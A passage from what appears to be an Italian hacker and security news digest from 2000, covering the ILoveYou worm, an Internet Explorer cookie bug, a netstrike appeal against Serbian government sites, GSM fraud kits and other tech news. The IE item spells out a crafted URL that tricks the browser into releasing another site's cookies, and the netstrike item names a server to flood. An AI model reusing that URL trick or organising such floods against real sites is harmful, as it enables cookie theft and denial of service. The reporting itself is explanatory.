di sicurezza Bugtraq e potrebbe diffondersi rapidamente sulla rete.




+--< Tutti dicono I LOVE YOU >--+ ]05/05/2000[ Virus ]

Sembra che i creatori di virus non si fermino più nemmeno difronte
ai sentimenti. "ILoveYou", riporta il soggetto dell'infame lettera,
ma dietro vi si cela un tradizionalissimo virus da e-mail, scritto
in VBScript e capace di auto-replicarsi attraverso l'invio di
messaggi a tutti i nominativi della rubrica di Outlook e di mIRC.
All'interno di queste e-mail si trova il messaggio "kindly check
the attached LOVELETTER coming from me." e in allegato il file
"LOVE-LETTER-FOR-YOU.TXT.vbs" che, se aperto, infetta il sistema.
Ma la cosa che più colpisce è la rapidità del tutto senza precedenti
con sui il codice si va diffondendo sulla rete.
La tecnica utilizzata da questo virus è quella già vista in altri
trojan tipo Melissa o Happy 99, con la differenza che, per ingannare
meglio anche gli utenti più smaliziati, il creatore ha utilizzato un
artificio già adottato dal virus VBS/Freelink, un noto "worm"
diffusosi qualche tempo fa soprattutto via IRC. In pratica la vera
estensione del file, in questo caso .vbs (ma poteva essere .pif,
.msc od un qualsiasi altro formato eseguibile di Windows), viene
celata dietro ad un'estensione "non sospetta", come .txt, .jpg o
.avi, l'unica visibile dall'utente. Questo è reso possibile dal
fatto che in Windows esiste l'opzione "Nascondi le estensioni dei
file per i tipi di file conosciuti" abilitata di default. Per
disattivarla basterà andare in Gestione Risorse/Opzioni
Cartella/Visualizzazione e levare il segno di spunta sulla relativa
voce. In questo modo sarà immediatamente possibile accertarsi che i
file pervenutici attraverso la posta elettronica, IRC o qualsiasi
altro servizio di Internet, siano effettivamente quello che "dicono
di essere"... In mIRC, invece, sarebbe prudente aggiungere in
File/Options/DCC/Folders tutte le estensioni tipiche dei worm script
nella casella "Ignore file types": in questo modo il programma
rifiuterà a priori la ricezione di file sospetti provenienti da
altri utenti. Oltre a replicarsi via e-mail, LoveLet si preoccupa di
rinominare i file .mp3, .jpg ed altri tipi ancora in .vbs in cui
infila il virus. Inoltre tenta di scaricare un file .EXE da quattro
siti Internet... Solitamente i programmi scritti in VBS funzionano
solo sui sistemi Windows 98/2000, ma divengono vulnerabili anche
Windows 95 ed NT4 nel caso vi sia installato Internet Explorer 5.
Pare che non corrano rischi, invece, coloro che hanno disabilitato
gli Windows Script Host o applicato le recenti security patch di
Microsoft. Le prime a lanciare l'allarme sono state due società
inglesi di prodotti per la sicurezza, GFI e Sophos, che hanno
battezzato il nuovo virus con il nome "VBS/LoveLet-A", ma che altri
chiamano "VBS/LoveLetter", definendone anche un'origine abbastanza
certa: le Filippine. Dopo aver già messo in ginocchio alcune grosse
aziende londinesi, fra cui una con 7mila dipendenti, LoveLet ha
rapidamente raggiuno il resto dell'Europa e, proprio in questi giorni,
anche l'Italia. Ne abbiamo avuto conferma dalle numerose mail
contenenti il famigerato soggetto "ILOVEYOU" che sono pervenute ieri
in redazione. Sembra che la velocità di diffusione di LoveLet sia
superiore persino a quella di Melissa e purtroppo, da quello che
possiamo vedere, anche qui in Italia non mancherà di espandersi a
macchia d'olio. Fortunatamente proprio in queste ore praticamente
tutti i maggiori produttori di antivirus hanno annunciato la
disponibilità di nuovi aggiornamenti in grado di riconoscere il
pericolo. A onor di cronaca bisogna dire che uno dei primi
antivirus ad essere stati aggiornati è il gratuito Inoculate
Personal Edition di Computer Associates.

+--< Playstation 2 tricolore >--+ ]12/05/2000[ Games ]

Il 26 ottobre la Playstation 2 sbarca in USA ed in Europa, due
continenti che finora si sono dovuti accontentare solo delle
foto sui giornali o di qualche costosissimo modello sfuggito
alle maglie delle dogane giapponesi.
Considerando che la console offre un lettore DVD/CD integrato
e la possibilità quindi di vedere i film sulla TV, il prezzo
di vendita di 600 mila lire (299$ in USA) risulta davvero aggressivo.
Dopo il clamoroso successo che anche qui in Italia aveva riscosso
la vecchia Playstation, Sony è molto fiduciosa nelle previsioni
di vendita, anche se i più maliziosi affermano che, specie qui
in Europa il grosso boom lo si ebbe anche grazie all'estrema
facilità con cui si potevano copiare i giochi. Vedremo...
Nel frattempo Sega, partita con circa un annetto di vantaggio,
tenta ora di contrastarne l'avanzata trionfale, applicando una
lenta ma progressiva diminuzione del prezzo del suo Dreamcast:
l'attuale sconto è di 50$.
Il prossimo anno Sony si troverà ad affrontare anche altri due
temibili concorrenti: Microsoft, con X-Box, e Nintendo con Dolphin.
Probabilmente alla fine del 2001 una console costerà quanto un tostapane.


+--< Internet Explorer, cookies a rischio >--+ ]15/05/2000[ Bug ]

Basta modificare una URL per impedire al browser Microsoft Internet
Explorer di compiere i suoi check di sicurezza e appropiarsi dei contenuti
dei cookies piazzati sui computer degli utenti internet. Questo il nuovo
bug emerso nelle ultime ore che sta creando non pochi problemi a Microsoft,
vista anche l'altissima diffusione dei cookies. Come noto, i cookies
consentono ai siti web di "riconoscere" gli utenti quando tornano su certe
pagine offrendo così numerose possibilità di "personalizzazione".
Intercettare un cookie, dunque, può dare accesso ad una serie di
informazioni personali sull'utente vittima.
Ad allertare del nuovo baco è stato il solito Bennett Haselton di
Peacefire che ha pubblicato una spiegazione del bug sul quale Microsoft ha
già fatto sapere che sta lavorando.
L'azienda ha comunque sottolineato che il bug non consente ad un eventuale
cracker male intenzionato di impossessarsi di tutti i cookies di un utente,
ma soltanto di intercettare, in certe condizioni, il cookie di utente e
perché questo accada, inoltre, "l'utente vittima" deve recarsi su pagine
web costruite "ad hoc" per sfruttare il baco. In una nota, Microsoft ha
comunque ammesso che "questa vulnerabilità consentirebbe ad un sito web di
leggere, modificare o cambiare i cookies che riguardano altri siti.
Dovremmo rilasciare una patch in tempi brevi".
Ma vediamo in cosa consiste il baco e come può essere "sfruttato". Il dato
essenziale è che Explorer rilascia le informazioni presenti in un cookie
soltanto al sito che in origine ha creato e inviato il cookie sul computer
dell'utente. Per accertarsi che il sito sia "quello giusto", Explorer
controlla che il dominio del cookie e quello del sito siano corrispondenti.
A fronte di una lunga URL, Explorer controlla tutto quello che c'è nella
URL prima del primo slash, cosicché legge "punto-informatico.it" anche se
la URL è "punto-informatico.it/standby".
Il baco si rivela utilizzando, al posto dello "slash" in una URL costruita
apposta, il simbolo "%2f", una alternativa che il browser però non
considera slash quando fa il controllo sui cookies. Questo significa che
una URL contenente quei caratteri al posto dello slash può ingannare il
browser, nascondendo il dominio del sito attaccante e inserendo uno slash
solo alla fine della URL di attacco. Per fare un esempio, una URL come
www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.amazon.com/
viene riconosciuta dal browser come appartenente al dominio Amazon.com.
Questo significa che a questo sito, che nulla ha a che vedere con Amazon,
Explorer rilascia i dati contenuti nel cookie che l'utente vittima ha
ricevuto quando ha visitato Amazon. E nel cookie possono essere archiviati
anche dati molto delicati... "In questo modo, ha spiegato Haselton, il tuo
nome o il tuo indirizzo di posta elettronica, piuttosto che i libri che hai
comprato online, possono essere individuati da un sito attaccante.
Qualsiasi sito che utilizza i cookie per l'autenticazione può essere
colpito".
Per "salvarsi" occorre disabilitare JavaScript da Explorer.
Gli utenti di Netscape non hanno, invece, nulla da temere.


+--< Plug-in per Outlook >--+ ]17/05/2000[ Virus ]

Dopo il pandemonio scatenato dal worm ILoveYou Microsoft sembra essersi
convinta che forse è giunta l'ora di rivedere un paio di cosette
riguardanti Outlook. Le critiche che maggiormente sono state rivolte
al software riguardavano soprattutto l'esecuzione automatica degli
attachment, una funzione che sebbene possa far risparmiare un paio di
click, di questi tempi si rivela assai rischiosa.
La patch per Outlook 98/2000, disponibile presso il sito di Microsoft
a partire dalla prossima settimana, disabilita proprio il lancio in
automatico degli allegati di posta elettronica "eseguibili", come ad
esempio .vbs, la tipica estensione dei file scritti in Visual Basic
Script, il linguaggio attualmente più in voga presso gli autori di
worm virus. La patch mette fine anche ad un'altra debolezza di Outlook
molto sfruttata dai virus che si diffondono via e-mail: la possibilità
che un qualsiasi programma possa accedere in modo trasparente alla
rubrica e inviare mail agli indirizzi ivi contenuti. D'ora in avanti,
l'utente sarà sempre avvertito in modo da poter decidere se avallare
l'operazione oppure bloccarla. Microsoft ha ammesso di essere sempre
alla ricerca del giusto compromesso fra potenza, flessibilità e
sicurezza, ma la bilancia non sembra per la verità tarata a dovere.
Queste piccole modifiche apportate dalla patch potevano essere
applicate molto prima, fin dai tempi della diffusione di worm
dilaganti come Happy99 o Melissa: i segnali premonitori di un'altra
epidemia di massa come quella causata da ILoveYou c'erano tutti e
le responsabilità, come giustamente hanno fatto notare molti lettori,
non possono certo essere imputate unicamente agli utenti.


+--< Netstrike contro Milosevic e le sue TV >--+ ]19/05/2000[ Hacktivism ]

L'incredibile appello lanciato a tutti i navigatori è chiaro e tondo:
mettere in crisi i server del regime serbo di Slobodan Milosevic, che
nelle ultime ore ha dato vita ad una massiccia repressione dei mezzi di
informazione dell'opposizione democratica. E farlo non tanto per "dare
fastidio" quanto invece per esprimere solidarietà a chi, in Serbia, si
batte contro il regime liberticida.
Sulle mailing list di ECN.org si va organizzando un netstrike, ovvero
una "incursione" di navigatori, tanti e abbastanza per mandare in tilt i
siti del regime. Una decisione, quella di diffondere l'appello per il
netstrike, nata dall'atmosfera che si respira online, un'atmosfera
tesissima che sembra preannunciare, per i prossimi giorni, sanguinosi
scontri per le strade di Belgrado.
L'idea del netstrike è di navigare per un'ora tutti i giorni, tra le 20
e le 21 sui siti da colpire e in particolare: il sito del Governo
jugoslavo, quello del ministero dell'Interno, del ministero
dell'informazione e dell'SPS, il partito di Milosevic. C'è chi suggerisce
di concentrare "le proprie forze" sul solo server del Ministero
dell'informazione, "sito centrale della propaganda di regime":
http://www.serbia-info.com/.
E' forse importante spendere due parole per chiarire a quanti intendessero
partecipare al Netsrike che si tratta di un'operazione politica e
aggressiva che mira a mettere fuori servizio servizi di altri, non è
un'azione pacifica o l'equivalente virtuale di una manifestazione
cittadina, come ha sostenuto qualcuno.
L'appuntamento, comunque, è per le 20, ora nella quale si tengono i
telegiornali di regime, e quindi ora "calda", per manifestare il dissenso
verso la politica repressiva e la solidarietà all'opposizione democratica.
Per seguire l'opposione ci sono vari canali. Due siti,
http://www.otpor.com/ e http://www.freeb92.net/, il canale IRC b92
(server irc.opennet.org) dove pare si parli serbo, inglese e
occasionalmente italiano.


+--< Hacker nella pubblica amministrazione? >--+ ]24/05/2000[ Cyberwar ]

"Se non puoi batterli, unisciti a loro": è forse seguendo questo
vecchio adagio che l'Aipa, l'autorità che ha il compito d'informatizzare
la pubblica amministrazione, ha reso di noto di stare prendendo in
considerazione l'ipotesi di assumere degli hacker, al fine di testare
la resistenza agli attacchi la rete unitaria della pubblica amministrazione.
Da un po' di tempo, da parte dell'amministrazione pubblica si sono
susseguite diverse pregevoli iniziative in Rete, in testa quella di
poter bypassare le code allo sportello per il ritiro, la consegna e
il relativo pagamento di Unico, il modulo per la dichiarazione dei
redditi. È poi di oggi la notizia che tutti i dipendenti pubblici
avranno la loro firma digitale, mediante la quale potranno autenticare,
in forma elettronica, in documenti (le Poste Italiane sono invece, da
poco, autorità per il rilascio di firma digitale). Per le aziende private
che operano in Internet, utilizzare hacker per testare la sicurezza delle
Reti, ed eventualmente organizzare delle valide difese è una pratica
abbastanza comune.


+--< Hackers: contro Metallica e Dr.Dre >--+ ]31/05/2000[ Hacktivism ]

Volevano protestare contro le iniziative antipirateria dei Metallica e di
Dr.Dre e per farlo hanno attaccato i server web della metropolitana di
Washington. Hanno tirato giù il sito e per alcune ore, almeno cinque,
hanno lasciato una home page modificata contenente, pare, testi a luci
rosse e slogan contro i musicisti che hanno preso di mira Napster, la
celebre "community" che consente ai suoi utenti di scambiarsi file musicali.
Gli hacker si sono identificati come "Idk2k" e come "immortal daemon killers",
aprendo con questa dichiarazione nella home page modificata: "benvenuti
nell'anno della conoscenza". Da quanto hanno scritto, pare considerino
cosa di poco conto l'hacking di un sito, dando invece molto rilievo al
fatto che l'attacco era "necessario" per protestare contro le denunce
antiNapster di Metallica e Dr.Dre. I responsabili del sito hanno dichiarato
di aver trasmesso i dati in loro possesso alle autorità investigative e
hanno affermato: "Tutto sommato è anche un bene che questi eventi accadano
di quanto in quando. Non che siano piacevoli, ma consentono di imparare e
ti spingono a prepararti per difenderti".


+--< Ora la pirateria online è sui film >--+ ]01/06/2000[ Pirateria ]

Con qualche ora di connessione e un po ' di pazienza per trovare il
titolo giusto è possibile scaricare dalla rete interi film con una
qualità accettabile, anche lungometraggi che si trovano ancora nei
cinema: questo il fenomeno indagato dal quotidiano americano USA Today
che ha dimostrato che in circa otto-dieci ore si può entrare in
possesso di copie pirata di film come "Il Gladiatore" o "American Beauty".
Come? Il meccanismo, già previsto e descritto su queste e altre pagine,
è quello ormai messo a punto da siti come Scour.com o iMesh che offrono
software di "community" e di scambio file. A differenza di Napster,
attaccato dall'industria discografica, i nuovi sistemi consentono di
scambiare qualsiasi genere di file, film digitalizzati compresi.
Fino a qualche settimana fa si parlava del giro di copie digitali di
film ma era ben più difficile trovare materiale da scaricare e gli
stessi software di Scour o iMesh non sembravano abbastanza stabili e
solidi da consentire un utilizzo semplice e facile a moltitudini di
utenti. Ora le cose vanno cambiando e tutto ciò che serve, a chi è
determinato nel procurarsi una copia di un film, è solo il tempo di
farlo. Intervistato da USA Today dopo l'inchiesta, il produttore de
"Il Gladiatore", Douglas Wick, ha affermato: "La cosa mi fa vomitare.
Uno passa moltissime ore a cercare di creare una experience di valore
per l'audience. L'idea che una copia mal fatta e non autorizzata sia
diffusa e vista su piccolo schermo è decisamente deprimente". Jack
Valenti, presidente della MPAA, l'associazione che raccoglie
l'industria di Hollywood, ha già dichiarato che "siamo determinati
a perseguire qualsiasi azienda renda disponibile illegalmente copie
dei nostri film". E Scour mette in guardia i contraffattori,
sottolineando i propri accordi con la società di produzione Miramax,
tesi alla realizzazione di un sistema di distribuzione online dei
film. Mentre iMesh si dichiara pronta ad agire in caso di
segnalazioni di copie illegali e ricorda che, proprio come Scour,
la propria policy esplicitata sul sito vieta qualsiasi uso illegale
del sistemone.


+--< Hackertronics: chiamate cellulari gratis >--+ ]13/06/2000[ Technology ]

Esiste da un po ', ma ultimamente ha rincarato la dose annunciando nuovi
prodottini di cracking con cui rischia di fare l'ein plein a spese degli
operatori GSM. Hackertronics.com è uno dei più sfacciati negozi online che
vendono programmi illegali per crackers in erba o scriptkiddies ma anche
sistemoni per frodare i gestori della telefonia mobile e utilizzare il
cellulare gratuitamente... Il tutto venduto via web con l'accettazione di
pagamenti effettuati con tutte le maggiori carte di credito, oltre che con
bonifici, assegni e via elencando. Cinque "i settori" coperti dai sistemini
di Hacketronics, per nulla economici ma, se si accetta quanto scritto sul
sito, "garantiti": Phone Phreaking & GSM Hacking Devices and Software (ovvero
sistemi per ottenere ricariche gratis per il cellulare o per utilizzare a
sbafo le linee telefoniche); Financial Hacking Devices; Cracking & Lockpicking
Tools, Devices and Secrets; Surveillance and Countermeasure Devices (007 e
affini); Unusual weaponry and stun devices. Pare che i gestori del sito stiano
ottenendo un discreto successo vendendo quella che potrebbe apparire una
bufala e che chiamano "GSM Prepaid Free Calls Kit", un device e un software
che, a sentire Hacketronics, permette di ricaricare la propria scheda
telefonica a spese dei gestori telefonici, anche quelli italiani.
Permetterebbe altresì di creare schede gratuite "a scadenza" da vendere a
terzi, per creare un vero e proprio mercato nero... Ecco la presentazione del
kit: "Finalmente è arrivato. Hackertronics.com ha commissionato ad un gruppo
di hacker la creazione di software e hardware per rendere facile a tutti
l'effettuazione di chiamate gratis via GSM. Dopo un anno il prodotto è stato
realizzato ed è il più avanzato sul mercato. Si possono fare telefonate da
GSM senza dover mai più ricaricare il cellulare. Basta usare il kit e
continuare ad aggiornare il software con i nuovi codici di bypass. Si possono
anche creare carte per chiamate gratuite da regalare ad altri, bastano dieci
minuti. Si possono anche fare carte gratuite che durano solo un giorno, una
settimana o un mese. Quindi si possono vendere e costringere chi le compra a
richiederne di nuove dopo un certo periodo di tempo. Così si fanno più soldi".
Affermano i cracker del sito: "Il nostro kit utilizza un metodo noto come
Algorithm Triangulation che individua i buchi di sicurezza nelle card GSM
utilizzate, in modo tale che quando si chiama, il sistema dell'operatore
telefonico non può togliere dalla scheda la spesa effettuata per la telefonata
Si può quindi chiamare senza limiti. Il kit è garantito per 12 mesi!".


+--< I nuovi mafiosi alle prese con la new economy >--+ ]13/06/2000[
Cyberwar ]

Le prime pagine di tutti i quotidiani sono dedicate alla notizia della
maxitruffa, organizzata a Wall Street da alcuni clan mafiosi newyorkesi, che
ha portato all’arresto di oltre 120 persone, tra cui molti broker, il
presidente e l’amministratore delegato di una catena di fast food e dieci
esponenti di Cosa Nostra. Le famiglie controllavano segretamente numerose
società di brokeraggio ha spiegato il procuratore Mary Jo White, che ha
coordinato la maxiretata attraverso le quali eseguivano vaste operazioni di
acquisto di titoli, in violazione alle regole della Sec, l’organismo di
controllo della Borsa. I reati sarebbero stati compiuti tra il ’95 e il ’99 e
a questo scopo le cinque grandi famiglie della mafia newyorkese avrebbero
formato un sodalizio. In questa circostanza i nuovi mafiosi hanno mostrato di
avere una grande dimestichezza con la new economy. La maxitruffa, infatti,
comportava la promozione di società e azioni che essi spacciavano per
dot-com al fine di indurre gli investitori a capitalizzare sul boom di
Internet.
Sul Corriere della Sera un’intervista a Richard Martin. Il detective di Pizza
Connection(lo scandalo di mafia e droga più clamoroso degli anni Ottanta)
rivela che in realtà Cosa Nostra continua a fare uso degli stessi metodi,
estorsione, corruzione e racket, ma ha anche imparato a sfruttare la Rete per
le sue attività criminali. Internet lascia spazio a chi si dedica al gioco
del pump and dump. Un termine del gergo di Internet che indica l’innalzamento
forzato del valore azionario allo scopo di venderlo improvvisamente intascando
miliardi. E’ un metodo classico del mercato, soprattutto nell’e-commerce,
dove è più facile diffondere voci false sui buoni o cattivi risultati di una
compagnia.


+--< SilentRunner, software spione >--+ ]16/06/2000[ Privacy ]

SilentRunner, il cui nome è già tutto un programma, è un software sviluppato
da una società che bazzica dalle parti della difesa americana e che è in grado
di analizzare, all'insaputa degli utenti, il traffico di una rete aziendale
alla ricerca di parole o frasi sospette ed eventuali backdoor che possano
essere sfruttate da hacker o impiegati interni all'azienda per divulgare
informazioni riservate. I risultati delle analisi vengono poi visualizzati
attraverso grafici 2D e 3D.
Il produttore del software, Raytheon, ha affermato che SilentRunner nasce in
risposta ad una crescente esigenza delle aziende che ogni anno vedono
aumentare i danni derivanti dallo spionaggio industriale e della rivendita di
informazioni segrete da parte dei propri impiegati. Sempre secondo Raytheon
il pregio del suo software, che ha un costo che si aggira fra i 25.000 ed i
65.000 dollari, è quello di evitare controlli intrusivi nei singoli file o
nelle singole e-mail dei dipendenti, riuscendo a carpire tutte le informazioni
necessarie direttamente dal flusso di dati
che passano attraverso la rete. Naturalmente restano da vedere le implicazioni
sulla privacy: chi può garantire i dipendenti di un'azienda che faccia uso di
un tale software, riguardo alla legittimità dei controlli realmente
effettuati?


+--< Il lato oscuro dell'elettronica >--+ ]16/06/2000[ Technology ]

Sei milioni di tonnellate: questo il peso di un anno di rifiuti elettronici
all'interno dell'Unione Europea. Questa "massa" di materiale altamente
inquinante oggi mette a rischio, più di altri generi di scarti, il già
dissestato ambiente europeo. Ed è questo il problemone che la Commissione
europea spera di riuscire a risolvere nel volgere di... qualche lustro. Se
tutto va per il meglio, cioè se non saranno posti troppi ostacoli su questa
strada, nel giro di un anno e mezzo potrebbe entrare in vigore una norma
comunitaria che consentirebbe il riciclaggio,a partire dal 2006, di un volume
tra il 60 e l'80 per cento della massa di rifiuti a rischio. Oggi gli scarti
elettronici costituiscono il 4 per cento del totale dei rifiuti prodotti dai
paesi UE. Entro la fine della decade questa percentuale potrebbe scendere
anche all'1 per cento, quantità comunque corrispondente a centinaia di
migliaia di tonnellate di rifiuti ad alto rischio non trattati.
Va sottolineato inoltre che, anche se la normativa entrerà in vigore, i
costruttori potranno continuare ad usare liberamente piombo, cadmio e
mercurio almeno fino al 2008.


+--< Visa, MasterCard bloccano le smart card? >--+ ]19/06/2000[ Antitrust ]

Gli stretti rapporti tra Visa e MasterCard sono finiti nel mirino
dell'Antitrust americano e ora vengono ritenuti da molti operatori
ed esperti responsabili della scarsa adozione delle smart card nei sistemi
statunitensi. Senza mezze parole, c'è chi accusa le due aziende di aver voluto
impedire la diffusione dei nuovi sistemi, che avrebbero potuto favorire la
concorrenza ai due colossi del settore.
A tentare di "rompere" quello che alcuni considerano un "fronte illegittimo"
ci ha provato l'anno scorso la superconcorrente American Express lanciando
Blue, una card "intelligente" dotata di microchip pensata sia come carta di
credito che come card per transazioni elettroniche più sicure. Ma, secondo
gli esperti, non ci sono speranze di una vera diffusione di questa e altre
offerte senza l'appoggio delle banche. Stando a Rob Enderle, del Giga
Information Group: "dal momento che Visa e MasterCard sono le piattaforme
dominanti, le banche non hanno interesse a installare lettori di smart card o
realizzare infrastrutture specifiche senza quelle carte di credito. Questo
mette le smart card in un angolo, poiché le aziende dominanti non hanno spinto
per la loro adozione".
Ma, a parte queste e altre accuse, Visa e MasterCard devono pensare a
difendersi nella causa intentata dal ministero della Giustizia, convinto
dell'esistenza di una situazione di "cartello monopolistico" nel settore
dalle due aziende.


+--< Gli Iron Maiden puntano sul CD scomodo >--+ ]19/06/2000[ Pirateria ]

L'idea è semplice e "suicida": controbattere chi scarica con un clic
interi brani musicali dalla rete, con l'offerta di un Compact Disc che
non può essere letto su player CD normali e deve essere "sbloccato"
utilizzando il personal computer. Questa la "geniale trovata" della band
degli Iron Maiden, gruppo storico dell'heavy metal.
Il progetto, che coinvolge addirittura 2 milioni di copie CD del nuovo
album degli Iron Maiden, è un tentativo di legare in modo indissolubile
il pagamento dei diritti d'autore all'ascolto della musica registrata sul
CD. Per riuscire a "fare breccia" nel cuore dei fan, alcune migliaia di CD
sono stati regalati ai convenuti all'ultimo concerto degli Iron Maiden in
Gran Bretagna.
Per ascoltare le tracce e visualizzare i contenuti multimediali registrati
nel CD, gli utenti dovranno utilizzare il personal computer per "sbloccare"
il disco, protetto da una chiave e da un formato proprietario di
registrazione che sfrutta le tecnologie DRM. Proprio a causa di questo
formato, i lettori tradizionali di CD non leggono il disco che può,
quindi, essere ascoltato solo con il computer.
Pare che Napster, il sistemone scambia-musica online accusato di tutto e
di più, ora sorrida.


+--< CyberWAR: sotto attacco i computer americani >--+ ]21/06/2000[ Cyberwar ]

Washington (USA) - "Si rischia una Pearl Harbor informatica, un disastro
senza precedenti": con queste parole un altissimo funzionario
dell'amministrazione Clinton ha "terrorizzato" Congresso e media americani,
parlando delle nuove scoperte della "difesa informatica".
Secondo Richard Clarke, che coordina il Consiglio per la sicurezza delle
infrastrutture e l'antiterrorismo, "non siamo più di fronte ad una
minaccia teorica ma ad un dato di fatto". Il pericolo, per gli States,
non è dato soltanto dal fatto di avere numerosi nemici grandi e piccoli
nel mondo ma di dipendere anche in modo massiccio dalle infrastrutture di
telecomunicazione. Sono anni che lo stesso Clarke avverte di un possibile,
disastroso "Pearl Harbor" informatico.
Lo scenario è decisamente preoccupante. Il gruppo di Clarke, è stato detto,
ha rilevato che diversi paesi sono impegnati "in un tracciamento
elettronico delle reti informative infrastrutturali degli Stati Uniti.
Stanno cercando modi per aggredire i network americani in periodo di
guerra".
Sebbene non siano stati nominati i paesi, da più parti si parla della
Corea del Nord e già in passato i vertici della CIA avevano avvertito il
Congresso delle operazioni di "information warfare" attive in Russia e
Cina.
Come noto, da tempo gli USA si preparano a quella che definiscono "guerra
dell'informazione", prevedendo anche la possibilità di attaccare "i
sistemi nemici", oltre che difendersi. Secondo Clarke i pericoli sono
molti: "Immaginate uno scenario nel quale le città hanno perso il
controllo dell'energia e dei telefoni, in cui i gasdotti saltano in tutto
il paese e i treni deragliano. Dopo un attacco del genere molti vorranno
sopprimere le libertà civili... Non so se prima di Pearl Harbor un
aereo-spia ogni giorno passasse a verificare le condizioni dell'obiettivo.
Ma so che se ci fosse stato e lo avessimo saputo, qualcosa di preventivo
si sarebbe potuto fare. Oggi abbiamo l'equivalente di aerei-spia nemici
che sorvolano il loro obiettivo tracciando le nostre reti".
"Non posso capire - ha attaccato Clarke - come sia possibile che un paese
come il nostro veda quanto sta accadendo e non reagisca".


+--< Linux, KDE e Gnome si danno la mano >--+ ]21/06/2000[ Linux ]

E ' stato un po ' il sogno di tutti gli utenti Linux vedere i due gruppi
di sviluppo di Gnome e KDE stringersi la mano e venirsi in contro
vicendevolmente: fino a ieri questo però era, per l'appunto, solo un sogno.
Oggi, grazie all'interessamento di alcuni noti sviluppatori open source,
un tale evento non sembra più così lontano. Pare infatti che Rivyn sia
riuscito nell'intento di mettere in contatto due anziani programmatori di
entrambi i gruppi di sviluppo e li abbia fatti ragionare su di un punto:
sviluppare congiuntamente un'architettura comune di componenti compatibile
con entrambi gli ambienti, KDE e Gnome.
Se gli ingranaggi di un simile progetto dovessero davvero mettersi in moto,
questo potrebbe comportare la fusione delle due architetture per la
riusabilità dei componenti: la Bonobo di Gnome e la Kparts di KDE.
Per il momento queste sono solo voci, peraltro non confermate, e pertanto
è meglio prendere la storia con estrema cautela, ma se davvero le
intenzioni fossero quelle qui menzionate, il timore che KDE e Gnome
finiscano per divenire totalmente incompatibili fra loro potrebbe essere
definitivamente allontanato.


+--< Il CERT tira ancora le Microsoft-orecchie >-

  
-+ ]22/06/2000[ Bug ]

Non si può dire che gli esperti del CERT (Computer Emergency Response Team) e
Microsoft vadano d'amore e d'accordo: qualcuno sarcasticamente sostiene che,
semplicemente, hanno due visioni del mondo contrapposte. Questa volta sulla
graticola del CERT è finita una patch recentemente rilasciata da Microsoft
con l'intenzione di mettere fine ad un buco di sicurezza trovato nel sistema
di Windows Help installato con Internet Explorer. In pratica grazie a questo
bug, e sotto certe condizioni, un hacker potrebbe essere in grado di eseguire,
da una locazione remota, dei file di help maliziosi sul server che gli
garantirebbero l'accesso totale al sistema. Secondo il CERT, la patch con cui
Microsoft avrebbe risolto il problema in realtà lascia aperte ancora alcune
altre strade che, sebbene più complesse da percorrere, per certi siti
continuano
a rappresentare vulnerabilità inaccettabili. Microsoft replica sostenendo che
la sua patch fa esattamente quello che deve fare: limita l'esecuzione dei file
di help ai soli amministratori locali, bloccando qualsiasi altro accesso da
remoto.
Sempre secondo la casa di Gates basterà applicare le regole di sicurezza di
base per prevenire incidenti. Chi riveste il ruolo di amministratore di
sistema farà comunque meglio a dare un'occhiata all'avviso del CERT e alle
istruzioni su come eliminare totalmente ogni rischio residuo.


+--< Quel computer è un cervello! >--+ ]23/06/2000[ Technology ]

Negli anni '60 lo chiamavano, sotto l'influenza degli autori di libri di
fantascienza, "cervello elettronico"; oggi il computer è divenuto un
elettrodomestico di uso comune e ha perso quell'alone di mistero che lo
circondava sono una decina di anni fa.
Eppure, a ben vedere, i computer sembrano destinati ad avvicinarsi sempre
più a quel primo appellativo, "cervello elettronico", per raggiungere
nuovi "traguardi". A spingere la ricerca verso computer sempre più
"intelligenti" e "umani" è proprio il MIT, baluardo tecnologico per
eccellenza, che ha annunciato l'avvio di un ambizioso progetto, Oxygen,
e la messa a punto di un nuovo circuito elettronico in grado di simulare
le attività cerebrali.
Quello creato dal MIT è il primo circuito elettronico ibrido
analogico/digitale che in pratica fonde insieme campi quali la
neurobiologia e la progettazione di computer dando vita ad una nuova
branca dell'ingegneria denominata "neuromorfica".
Il chip è stato costruito partendo da normali transistor sistemati in
una rete ad anello formata da 16 neuroni artificiali connessi fra loro
da sinapsi. Ogni neurone è connesso ad altri 4 neuroni e ad un nucleo che
ha il compito di regolare le reazioni e sopprimere gli impulsi
considerati "rumore" fornendo delle priorità: è un po ' come quando più
persone attorno a noi ci parlano e noi riusciamo a focalizzare la nostra
attenzione solo su una di loro, quella che in quel momento gode del
nostro interesse.
Nonostante possa suonare tutto molto complesso, Rahul Sarpeshkar,
professore al MIT, afferma che questo approccio risulta di gran lunga
più semplice se comparato a quello dei tradizionali circuiti neurali;
semplice, ma estremamente efficace.
Biologia e computer sembra un connubio destinato a segnare il futuro
delle macchine, che, se anche non somiglieranno affatto a quelle
descritte nei libri di fantascienza, potrebbero davvero essere in grado
di mascherare, almeno in parte, il loro cuore di latta.
Sempre dal MIT arriva notizia dell'avvio di Oxygen, un progettone che
coinvolge alcuni grandi nomi, fra cui HP, Nokia e Philips, per lo
sviluppo di una nuova generazione di computer e info appliance in grado
di servire al meglio l'uomo attraverso forme di intelligenza artificiale
e con lo sfruttamento massiccio delle reti a mezzo di connessioni
wireless.
Gli scienziati del MIT sostengono che dopo 40 anni in cui è stato l'uomo
a provvedere ai computer, è ora il tempo che siano i computer a
provvedere ai bisogni umani. Un obiettivo da brivido, in tutti i sensi,
per raggiungere il quale le sei società coinvolte nel progetto stanno
sviluppando una complessa rete wireless attraverso cui una serie di
dispositivi handheld potranno funzionare come "agenti intelligenti",
in grado di riconoscere i volti e la voce dei suoi utenti.
La grande rivoluzione di questa nuova generazione di computer è
rappresentata dal fatto che i "mezzi" per arrivare a dei risultati non
verranno più cercati su di una memoria di massa, bensì direttamente su di
una rete di network, con la quale saranno totalmente integrati e dalla
quale trarranno ogni genere di informazione e risorsa per espletare i
loro compiti.
Il primo prodotto nato in seno al progetto Oxygen e pensato per il
mercato consumer sarà Handy 21, un handhled dotato di display LCD,
telecamera e GPS, in grado di interagire con una rete di computer
chiamati Enviro 21.
Gli Enviro 21 equipaggeranno auto, case, uffici e vari mezzi di
trasporto, e saranno dotati di sensori, microfoni e telecamere: ognuno
di essi sarà connesso in modo permanente ad una rete chiamata Network 21
da cui attingerà ogni genere di risorse.


+--< Mitnick chiede maggiori libertà >--+ ]26/06/2000[ Cyberlaw ]

Kevin Mitnick, l'hacker reso celebre dalle sue disavventure giudiziarie
senza precedenti, torna oggi in tribunale per chiedere la rimozione di
alcune limitazioni alla propria libertà di espressione. Nel dispositivo
